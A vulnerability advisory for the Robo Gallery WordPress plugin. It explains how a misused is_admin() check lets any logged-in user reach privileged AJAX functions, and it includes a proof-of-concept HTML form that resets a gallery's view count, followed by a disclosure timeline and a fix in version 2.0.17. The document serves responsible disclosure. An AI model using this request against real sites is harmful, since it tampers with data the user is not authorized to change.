While reviewing a false report of a vulnerability in the Robo Gallery plugin today we noticed the plugin actually had a privilege escalation vulnerability in the code mentioned in that other report. In version 2.0.15, and some prior versions, the function rbs_gallery_ajax_callback in the file /includes/rbs_gallery_ajax.php allows anyone logged in to WordPress to access the functions in the file /includes/extensions/rbs_create_post_ajax.php, which not all levels of users should have access to.
In version 2.0.15 an attempt was made to stop this by restricting access to the function rbs_gallery_ajax_callback to administrators using the the function is_admin(). The problem with that is that the function doesn’t actually doesn’t check if a user is an administrator. Instead it checks if “if the Dashboard or the administration panel is attempting to be displayed”. Since it “will return true when trying to make an ajax request (both front-end and back-end requests)”, this had no impact in this situation since it involves an ajax request.
Proof of Concept
The following proof of concept will reset a gallery’s view count to 0.
Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress and “[id of gallery]” with the ID of the gallery you are resetting the view count of.
<html> <head> </head> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=rbs_gallery" method="post"> <input type="hidden" name="function" value="reset_views" /> <input type="hidden" name="galleryid" value="[id of gallery]" /> <input type="submit" value="Submit" /> </form> </body> </html>
- 4/12/2016 – Developer notified the issue has not been resolved.
- 4/12/2016 – Developer responds that fix forthcoming.
- 4/16/2016 – Version 2.0.17 released, which fixes vulnerability.